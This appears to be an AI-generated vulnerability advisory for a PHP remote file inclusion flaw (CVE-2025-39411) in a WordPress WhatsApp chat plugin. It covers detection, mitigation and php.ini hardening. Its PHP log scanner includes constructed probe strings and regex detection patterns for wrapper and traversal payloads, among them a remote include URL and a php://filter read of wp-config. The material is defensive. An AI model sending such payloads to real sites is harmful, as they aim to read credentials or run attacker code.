CVE-2025-39411 Overview
CVE-2025-39411 is a PHP Remote File Inclusion (RFI) vulnerability in the Indie_Plugins WhatsApp Click to Chat Plugin for WordPress (wpt-whatsapp). The flaw affects all plugin versions up to and including 2.2.12. It is classified under CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program.
An attacker can manipulate a filename parameter passed to a PHP include or require statement, causing the plugin to load attacker-controlled code. Successful exploitation requires user interaction and high attack complexity but yields full impact on confidentiality, integrity, and availability.
Critical Impact
Successful exploitation enables arbitrary PHP code execution on the WordPress host, leading to full site compromise, data theft, and lateral movement.
Affected Products
- Indie_Plugins WhatsApp Click to Chat Plugin for WordPress (wpt-whatsapp), all versions up to and including 2.2.12 (the NVD entry lists no lower bound)
- WordPress installations with the wpt-whatsapp plugin enabled
- Any hosting environment running the affected plugin version
Discovery Timeline
- 2025-05-19 - CVE-2025-39411 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-39411
Vulnerability Analysis
The vulnerability stems from improper control over a filename argument supplied to a PHP file inclusion statement within the wpt-whatsapp plugin. When user-controlled input reaches an include, include_once, require, or require_once call without sanitization or allowlisting, PHP interprets and executes the referenced file as code.
In an RFI scenario the included file is fetched from a remote URL, which works only when allow_url_include=On (Off by default since PHP 5.2), or read from a local path the attacker has already populated, such as an uploaded image carrying PHP, a log file, or a php://filter stream over an existing file. Either way the result is arbitrary PHP code execution as the web server user. According to the EPSS model, the vulnerability has a probability score of 0.561% (68th percentile) for exploitation activity.
Root Cause
The plugin passes externally influenced data into a PHP file inclusion function without validating the resolved path against a known-good list. PHP's include and require accept relative paths, php://, phar:// and compress.* wrappers regardless of configuration, and accept http://, ftp:// and data:// targets when allow_url_include is enabled, so any unvalidated value gives the attacker several ways to select what gets executed.
Attack Vector
The attack vector is network-based. Exploitation requires user interaction, such as enticing an authenticated WordPress user or administrator to visit a crafted URL that triggers the vulnerable code path. The attacker supplies a parameter pointing to a malicious payload, which the plugin then includes and executes. Detailed advisory information is available in the Patchstack WordPress Vulnerability Report.
No public proof-of-concept exploit code is currently associated with this CVE.
Detection Methods for CVE-2025-39411
Indicators of Compromise
- Unexpected outbound HTTP/HTTPS requests from the WordPress server to attacker-controlled hosts during page rendering
- New or modified PHP files in the wp-content/plugins/wpt-whatsapp/ directory or in WordPress upload paths
- Web server access logs containing query parameters with values resembling URLs, php://, data://, or path traversal sequences targeting wpt-whatsapp endpoints
- Anomalous PHP processes spawning shell commands or network connections
Detection Strategies
- Inspect WordPress and reverse proxy logs for requests to wpt-whatsapp files containing suspicious filename parameters
- Deploy a Web Application Firewall (WAF) ruleset that flags PHP wrapper schemes and externally hosted include targets
- Compare plugin file hashes against the distribution package of the installed release (2.2.12 or earlier, as downloaded from the vendor) to identify tampering; this detects modified or added files, not the vulnerability itself
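The log inspection listed above, as an added example that is not part of the original page: a scanner that reads combined-format access-log lines, restricts itself to requests under the plugin's directory, and flags parameter values that look like remote URLs, PHP stream wrappers, data: payloads, traversal sequences or null bytes, decoding once more after the query parser to catch double-encoded probes. The log lines are constructed for the demo and the `layout` parameter and `includes/view.php` endpoint in them are hypothetical, not the plugin's real names.

```php
<?php
declare(strict_types=1);

// Added example, not from the page or the plugin: scans Apache/nginx combined
// access-log lines for requests to wpt-whatsapp paths whose query parameters
// carry inclusion-style payloads. The log lines at the bottom are constructed
// for this demo; the endpoint and parameter names in them are hypothetical.

const PLUGIN_PATH_MARKER = 'wp-content/plugins/wpt-whatsapp/';

// Matched, in order, against each decoded parameter value.
const RFI_PATTERNS = [
    'remote scheme'  => '#^\s*(?:https?|ftps?)://#i',
    'php wrapper'    => '#^\s*(?:php|phar|expect|glob|zip|compress\.[a-z]+)://#i',
    'data wrapper'   => '#^\s*data:#i',
    'path traversal' => '#(?:^|[\\\\/])\.\.(?:[\\\\/]|$)#',
    'null byte'      => '#\x00#',
];

// Apache "combined" format: ip - user [time] "METHOD /target HTTP/x" status ...
function parse_log_line(string $line): ?array
{
    if (!preg_match('#^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})#', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5]];
}

function inspect_request(array $req): array
{
    $findings = [];
    $qpos  = strpos($req['target'], '?');
    $path  = $qpos === false ? $req['target'] : substr($req['target'], 0, $qpos);
    $query = $qpos === false ? '' : substr($req['target'], $qpos + 1);

    // Scope to the plugin's own files: URLs in wp-admin parameters such as
    // redirect_to are legitimate and would otherwise be false positives.
    if (strpos($path, PLUGIN_PATH_MARKER) === false) {
        return $findings;
    }
    parse_str($query, $params);            // first percent-decode happens here
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;
        }
        $decoded = rawurldecode($value);   // second pass: double-encoded probes
        foreach (RFI_PATTERNS as $label => $re) {
            if (preg_match($re, $decoded)) {
                $findings[] = ['ip' => $req['ip'], 'time' => $req['time'],
                               'param' => (string) $name, 'value' => $decoded,
                               'reason' => $label];
                break;
            }
        }
    }
    return $findings;
}

function scan_log(array $lines): array
{
    $alerts = [];
    foreach ($lines as $n => $line) {
        $req = parse_log_line($line);
        if ($req === null) {
            continue;
        }
        foreach (inspect_request($req) as $f) {
            $alerts[] = ['line' => $n + 1] + $f;
        }
    }
    return $alerts;
}

// Constructed sample: lines 2, 3, 4 and 6 should be flagged; 1 and 5 should not.
$sample_log = [
    '203.0.113.7 - - [19/May/2025:10:14:01 +0000] "GET /wp-content/plugins/wpt-whatsapp/includes/view.php?layout=floating HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/May/2025:10:14:09 +0000] "GET /wp-content/plugins/wpt-whatsapp/includes/view.php?layout=http://198.51.100.23/s.txt%3F HTTP/1.1" 200 512 "-" "curl/8.4"',
    '198.51.100.23 - - [19/May/2025:10:15:30 +0000] "GET /wp-content/plugins/wpt-whatsapp/includes/view.php?layout=..%2F..%2F..%2Fuploads%2F2025%2F05%2Fimg.jpg HTTP/1.1" 200 77 "-" "python-requests/2.31"',
    '198.51.100.23 - - [19/May/2025:10:15:41 +0000] "GET /wp-content/plugins/wpt-whatsapp/includes/view.php?layout=php://filter/convert.base64-encode/resource=../../../../wp-config HTTP/1.1" 200 4096 "-" "python-requests/2.31"',
    '192.0.2.44 - - [19/May/2025:10:16:02 +0000] "GET /wp-admin/admin.php?page=wpt-whatsapp&redirect_to=https://example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [19/May/2025:10:16:05 +0000] "GET /wp-content/plugins/wpt-whatsapp/includes/view.php?layout=%252e%252e%252fwp-config HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
];

foreach (scan_log($sample_log) as $a) {
    printf("line %d %s [%s] param=%s reason=%s value=%s\n",
           $a['line'], $a['ip'], $a['time'], $a['param'], $a['reason'], $a['value']);
}
```

Two design points carry over to a SIEM rule: the path scope (a bare "URL in a query string" rule fires constantly on normal WordPress traffic) and the extra decode pass, since scanners routinely double-encode `../` and `://` to slip past filters that match only once. Correlate hits with the server's own outbound connections (the first indicator of compromise above) to separate a probe from a successful include.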
Monitoring Recommendations
- Forward WordPress, PHP-FPM, and web server logs to a centralized SIEM for correlation and retention
- Alert on PHP worker processes that initiate unexpected outbound connections or write to plugin directories
- Track plugin inventory and version drift across WordPress estates to identify unpatched installations
How to Mitigate CVE-2025-39411
Immediate Actions Required
- Identify all WordPress sites running the wpt-whatsapp plugin and confirm whether the version is 2.2.12 or earlier
- Disable the WhatsApp Click to Chat Plugin until a patched release is installed
- Restrict administrative access to WordPress and require multi-factor authentication to limit user-interaction attack paths
- Review the affected hosts for signs of compromise before restoring the plugin
Patch Information
At the time of publication, the NVD entry references the Patchstack WordPress Vulnerability Report as the authoritative source for fix availability. Administrators should upgrade to a plugin release later than 2.2.12 once published by the vendor and verify the new version on every affected site.
Workarounds
- Remove or deactivate the wpt-whatsapp plugin and replace it with a maintained alternative if a patched version is unavailable
- Confirm allow_url_include=Off in php.ini (the default since PHP 5.2; the directive is deprecated as of PHP 7.4) to block inclusion of http://, ftp:// and data:// targets. Setting allow_url_fopen=Off additionally blocks fopen()/file_get_contents() on URLs, which WordPress relies on only when cURL is unavailable; test updates and the HTTP API after changing it. Neither setting stops inclusion of local files the attacker controls (uploads, logs, session files) or php://filter reads, so they narrow the exposure rather than remove it
- Apply WAF rules that block requests to the plugin's own paths carrying http://, https://, ftp://, php://, phar:// or data: schemes, or traversal sequences, in query parameters; scope the rule to the plugin directory, because core WordPress parameters such as redirect_to legitimately contain URLs
- Enforce least privilege on the web server user to limit damage if code execution occurs
; php.ini hardening to mitigate PHP Remote File Inclusion
; allow_url_include gates http://, ftp:// and data:// include targets (Off by default,
; deprecated since PHP 7.4); php://filter and phar:// are unaffected by it
allow_url_include = Off
; also disables fopen()/file_get_contents() on URLs; WordPress uses that path only when cURL is missing, so test after changing
allow_url_fopen = Off
; placeholder paths: use the real document root plus PHP's temp and session directories
open_basedir = "/var/www/html:/tmp"
; removes the common shell pivot after code execution; PHP-native file and socket I/O still works
disable_functions = "exec,passthru,shell_exec,system,proc_open,popen"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.